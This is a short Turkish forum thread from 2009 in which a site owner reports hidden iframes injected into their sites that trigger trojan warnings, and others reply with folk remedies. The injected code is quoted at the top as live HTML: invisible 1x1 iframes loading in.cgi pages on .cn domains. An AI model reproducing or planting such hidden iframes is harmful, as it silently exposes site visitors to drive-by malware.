<body><iframe src="http://cheapslotplay.cn/in.cgi?income46" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe> <body><iframe src="http://thelotbet.cn/in.cgi?income39" width=1 height=1 style="visibility: hidden"></iframe>
iframe atılmış
35
●2.853
- 08-04-2009, 23:41:58Sunucumdaki bir çok siteye alttaki iframeler atılmış ve sitelerime girince trojen uyarısı alıyorum acaba bu neden kaynaklanmış olabilir ?
- 09-04-2009, 00:09:03Sabonun sitesine girdiğimde r10.net in ana sayfasındaki iframe virüsü ile aynı uyarıyı veriyor kaspersky.
- 09-04-2009, 00:13:27Scriptler farklı creep. Şurdaki olayı yaşıyorum; https://www.r10.net/forumda/352657-r1...s-uyarisi.html
- 09-04-2009, 00:23:51Üyeliği durdurulduhocam neden nasıl bulastıgını bilmiyorum ama ftp kople silmen o sitelerin ftp sine ie den baglanmaman ve pc format atman gerekli 3 kere format attım yine gitmedi en son tamirciye attırdım format öyle gitti ama suan ftp den tekrar bulastı yani ftp ve pc kople silmen gerekli yedek almadan herseyin içine bulasıyorlar
biraz sacma ama fazla bi bilgim olmadıgından benim acımdan tek kurtulus herseyi silmek yedek alırsan ummadıgın dosyadan tekrar cıkıyor ve ftp ye ftpden de kullanıcılara gidiyor
Benzer bir uyarı çıkacak mı merak ediyorum...